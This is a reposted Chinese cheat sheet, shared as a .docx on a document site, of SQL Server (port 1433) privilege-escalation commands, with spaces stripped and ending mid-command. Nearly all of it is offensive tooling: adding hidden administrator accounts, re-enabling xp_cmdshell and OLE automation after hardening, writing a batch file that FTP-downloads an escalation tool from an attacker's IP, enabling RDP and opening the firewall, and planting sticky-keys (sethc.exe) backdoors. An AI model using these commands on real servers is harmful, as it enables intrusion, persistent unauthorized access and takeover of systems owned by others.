本人专用的1433修复全部口令全集.docx

本人专用的1433修复全部口令全集.docx

《本人专用的1433修复全部口令全集.docx》由会员分享，可在线阅读，更多相关《本人专用的1433修复全部口令全集.docx（23页珍藏版）》请在冰豆网上搜索。

本人专用的1433修复全部口令全集

本人专用的1433修复全部口令全集2010-11-0603:

44转载自ermengzi888最终编辑ermengzi888本人专用的1433修复全部口令全集（申请点亮）

◆◆◆◆◆◆◆◆◆◆◆◆◆◆

netnet1被禁止时执行CMD命令

netuserAdministrator$920517/add

netlocalgroupadministratorsAdministrator$/add

第一步：

dirnet.exe/s/p或者dirnet1.exe/s/p

第二步：

C:

\WINDOWS\system32\dllcache\net1.exeuser123123/add

第三步：

C:

\WINDOWS\system32\dllcache\net1.exelocalgroupadministrators123/add

◆◆◆◆◆◆◆◆◆◆◆◆◆◆

沙盘模式提权

sethc.exe禁止

select*fromopenrowset（'microsoft.jet.oledb.4.0',';database=c:

\windows\system32\ias\ias.mdb','selectshell（"caclsc:

\windows\system32\net.exe/e/t/geveryone:

F'）

netnet1都被禁用

select*fromopenrowset（'microsoft.jet.oledb.4.0',';database=c:

\windows\system32\ias\ias.mdb','selectshell（"xcopytaskmgr.exesethc.exe/y"）'）

如果cmd被禁用

select*fromopenrowset（'microsoft.jet.oledb.4.0',';database=c:

\windows\system32\ias\ias.mdb','selectshell（"netuseruserpass/add"）'）

◆◆◆◆◆◆◆◆◆◆◆◆◆◆

除了xplog70.dll其他的都可以用这命令修复

第一步先删除：

dropproceduresp_addextendedproc

dropproceduresp_oacreate

execsp_dropextendedproc'xp_cmdshell'

服务器:

消息3701，级别11，状态5，行1

无法除去过程'sp_addextendedproc'，因为它在系统目录中不存在。

服务器:

消息3701，级别11，状态5，过程sp_dropextendedproc，行18

无法除去过程'xp_cmdshell'，因为它在系统目录中不存在。

第二步恢复：

dbccaddextendedproc（"sp_oacreate","odsole70.dll"）

dbccaddextendedproc（"xp_cmdshell","xplog70.dll"）

直接恢复，不管sp_addextendedproc是不是存在

◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆

1.未能找到存储过程'master..xpcmdshell'之解决方法：

EXECsp_addextendedprocxp_cmdshell,@dllname='xplog70.dll'declare@oint

sp_addextendedproc'xp_cmdshell','xpsql70.dll'

◆◆◆◆◆◆◆◆◆◆◆◆◆

恢复sp_addextendedproc语句：

createproceduresp_addextendedproc---1996/08/3020:

13

@functnamenvarchar（517）,/*（owner.）nameoffunctiontocall*/

@dllnamevarchar（255）/*nameofDLLcontainingfunction*/

as

setimplicit_transactionsoff

if@@trancount>0

begin

raiserror（15002,-1,-1,'sp_addextendedproc'）

return

（1）

end

dbccaddextendedproc（@functname,@dllname）

return（0）--sp_addextendedproc

GO

◆◆◆◆◆◆◆◆◆◆◆◆◆

2无法装载DLLxpsql70.dll或该DLL所引用的某一DLL。

原因126（找不到指定模块。

）

恢复方法：

查询分离器连接后，

sp_dropextendedproc"xp_cmdshell"

sp_addextendedproc'xp_cmdshell','xpsql70.dll'

修复XPLOG70.DLL（先用文件查看下备份的目录下\x86\bin,然后把下面目录替换）

第一步

execsp_dropextendedproc'xp_cmdshell'

第二步

dbccaddextendedproc（"xp_cmdshell","c:

\sql2ksp4\x86\binn\xplog70.dll"）

◆◆◆◆◆◆◆◆◆◆◆◆◆

126错误

修复XPLOG70.DLL（先用文件查看下备份的目录下\x86\bin,然后把下面目录替换）

第一步

execsp_dropextendedproc'xp_cmdshell'

第二步

dbccaddextendedproc（"xp_cmdshell","c:

\sql2ksp4\x86\binn\xplog70.dll"）

◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆

127错误

execsp_dropextendedproc'xp_cmdshell'

execsp_addextendedproc'xp_cmdshell','c:

\ProgramFiles\MicrosoftSQLServer\MSSQL\Binn\xplog70.dll'

dbccaddextendedproc（"xp_cmdshell","c:

\ProgramFiles\MicrosoftSQLServer\MSSQL\Binn\xplog70.dll"）

◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆

4.直接添加帐户法

删除odsole70.dll：

execmaster..sp_dropextendedprocsp_oamethod

execmaster..sp_dropextendedprocsp_oacreate

恢复odsole70.dll：

execsp_addextendedprocsp_OAMethod,'odsole70.dll'

execsp_addextendedprocsp_OACreate,'odsole70.dll'

直接添加帐户命令：

declare@shellintexecsp_oacreate'wscript.shell',@shelloutputexecsp_oamethod

@shell,'run',null,'c:

\windows\system32\cmd.exe/cnetusersinsinhack/add'

declare@shellintexecsp_oacreate'wscript.shell',@shelloutputexecsp_oamethod@shell,'run',null,'c:

\windows\system32\cmd.exe/cnetlocalgroupadministratorssin/add'

FTP下载命令

declare@oint,@fint,@tint,@retint

execsp_oacreate'scripting.filesystemobject',@oout

execsp_oamethod@o,'createtextfile',@fout,'C:

\1.bat',1

exec@ret=sp_oamethod@f,'writeline',NULL,'openIP'

exec@ret=sp_oamethod@f,'writeline',NULL,'ftp账号'

exec@ret=sp_oamethod@f,'writeline',NULL,'ftp密码'

exec@ret=sp_oamethod@f,'writeline',NULL,'geten.exe（无net提权脚本）c:

\en.exe'

exec@ret=sp_oamethod@f,'writeline',NULL,'bye'

3、net提权出现拒绝访问错误5（重点）

这种情况就不用尝试net1了，可以试试copyshift后门，如果copy后提示复制0文件，证明没有成功。

那么可以试试能不能上传，如果能上传直接传个前段时间出来的无net提权工具，然后加个用户就可以了。

但是这种情况大部分都是不能上传的，那么就要考虑一下了。

既然能执行cmd，那么就能通过cmd下ftp下载文件，可是ftp前提是要能写进文本或批处理。

那么就可以通过sql语句写进一个文本或批处理啊。

declare@oint,@fint,@tint,@retint

execsp_oacreate'scripting.filesystemobject',@oout

execsp_oamethod@o,'createtextfile',@fout,'C:

\1.bat',1

exec@ret=sp_oamethod@f,'writeline',NULL,'openIP'

exec@ret=sp_oamethod@f,'writeline',NULL,'ftp账号'

exec@ret=sp_oamethod@f,'writeline',NULL,'ftp密码'

exec@ret=sp_oamethod@f,'writeline',NULL,'geten.exe（无net提权脚本）c:

\en.exe'

exec@ret=sp_oamethod@f,'writeline',NULL,'bye'

查询分析器执行成功后，不出意外，会在c盘出现一个1.bat（如果执行成功了，c盘却没有，可以换个文件夹写入，因为哪个服务器c盘根目录禁止写入）

然后cmd执行ftp-s:

c:

\1.bat

这个执行完了以后，就会在c盘ftp下载一个无net提权脚本或者直接写个vbs提权脚本

declare@oint,@fint,@tint,@retint

execsp_oacreate'scripting.filesystemobject',@oout

execsp_oamethod@o,'createtextfile',@fout,'c:

\1.vbs',1

exec@ret=sp_oamethod@f,'writeline',NULL,'Seto=CreateObject（"Shell.Users"）'

exec@ret=sp_oamethod@f,'writeline',NULL,'Setz=o.create（"用户"）'

exec@ret=sp_oamethod@f,'writeline',NULL,'z.changePassword"密码",""'

exec@ret=sp_oamethod@f,'writeline',NULL,'z.setting（"AccountType"）=3'

然后cmd执行cscriptc:

\1.vbs就可以了

◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆

Cmd命令开3389：

REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnections/tREG_DWORD/d0/f

1.查询终端端口

REGqueryHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server\WinStations\RDP-Tcp/vPortNumber

2.开启XP&2003终端服务

REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnections/tREG_DWORD/d00000000/f

3.更改终端端口为2008（0x7d8）默认为3389（0xD3D）

REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server\Wds\rdpwd\Tds\tcp/vPortNumber/tREG_DWORD/d0x7d8/f

REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server\WinStations\RDP-Tcp/vPortNumber/tREG_DWORD/d0x7D8/f

4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制

REGADDHKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List/v3389:

TCP/tREG_SZ/d3389:

TCP:

*:

Enabledxpsp2res.dll,-22009/f

sql语句开3389

开3389：

execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer','fDenyTSConnections','REG_DWORD',0;--

关3389：

execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer','fDenyTSConnections','REG_DWORD',1;

查看3389端口

execxp_regread'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp','PortNumber'

查看系统版本

typec:

\boot.ini

普通CMD后门

xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe','debugger','reg_sz','c:

\windows\system32\cmd.exe'

5下shift后门命令

declare@oint

execsp_oacreate'scripting.filesystemobject',@oout

execsp_oamethod@o,'copyfile',null,'c:

\windows\explorer.exe','c:

\windows\system32\sethc.exe';

declare@oint

execsp_oacreate'scripting.filesystemobject',@oout

execsp_oamethod@o,'copyfile',null,'c:

\windows\system32\sethc.exe','c:

\windows\system32\dllcache\sethc.exe';

copyc:

\windows\explorer.exec:

\windows\system32\sethc.exe

copyc:

\windows\system32\sethc.exec:

\windows\system32\dllcache\sethc.exe

◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆

5.恢复时一些常用的SQL语句：

利用sp_addextendedproc恢复大部分常用存储扩展（得先利用最顶上的语句恢复自己）：

usemaster

execsp_addextendedprocxp_cmdshell,'xp_cmdshell.dll'

execsp_addextendedprocxp_dirtree,'xpstar.dll'

execsp_addextendedprocxp_enumgroups,'xplog70.dll'

execsp_addextendedprocxp_fixeddrives,'xpstar.dll'

execsp_addextendedprocxp_loginconfig,'xplog70.dll'

execsp_addextendedprocxp_enumerrorlogs,'xpstar.dll'

execsp_addextendedprocxp_getfiledetails,'xpstar.dll'

execsp_addextendedprocsp_OACreate,'odsole70.dll'

execsp_addextendedprocsp_OADestroy,'odsole70.dll'

execsp_addextendedprocsp_OAGetErrorInfo,'odsole70.dll'

execsp_addextendedprocsp_OAGetProperty,'odsole70.dll'

execsp_addextendedprocsp_OAMethod,'odsole70.dll'

execsp_addextendedprocsp_OASetProperty,'odsole70.dll'

execsp_addextendedprocsp_OAStop,'odsole70.dll'

execsp_addextendedprocxp_regaddmultistring,'xpstar.dll'

execsp_addextendedprocxp_regdeletekey,'xpstar.dll'

execsp_addextendedprocxp_regdeletevalue,'xpstar.dll'

execsp_addextendedprocxp_regenumvalues,'xpstar.dll'

execsp_addextendedprocxp_regread,'xpstar.dll'

execsp_addextendedprocxp_regremovemultistring,'xpstar.dll'

execsp_addextendedprocxp_regwrite,'xpstar.dll'

execsp_addextendedprocxp_availablemedia,'xpstar.dll'

恢复cmdshell：

execsp_addextendedprocxp_cmdshell,@dllname='xplog70.dll'

◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆

◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆

1.sql命令查询注册表粘滞键是否被劫持

execmaster..xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe','Debugger'

2.sql命令劫持注册表粘滞键功能,替换成任务管理器（当然你也可以替换成你想要的其他命令）

xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe',

'Debugger','REG_SZ','C:

\WINDOWS\system32\taskmgr.exe'

3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用

xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe'

◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆

SQLServer阻止了对组件'xp_cmdshell'的过程'sys.xp_cmdshell'的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。

系统管理员可以通过使用sp_configure启用'xp_cmdshell'。

有关启用'xp_cmdshell'的详细信息，请参阅SQLServer联机丛书中的"外围应用配置器"。

;EXECsp_configure'showadvancedoptions',1--

;RECONFIGUREWITHOVERRIDE--

;EXECsp_configure'xp_cmdshell',1--

;RECONFIGUREWITHOVERRIDE--

;EXECsp_configure'showadvancedoptions',0--

◆◆◆◆◆◆◆◆◆◆◆◆◆

分析器执行的语句：

EXECsp_configure'showadvancedoptions',1;RECONFIGURE;EXECsp_configure'xp_cmdshell',1;RECONFIGURE;

◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆

xpsql.cpp:

错误5来自CreateProcess（第737行）直接加帐号！

EXECmaster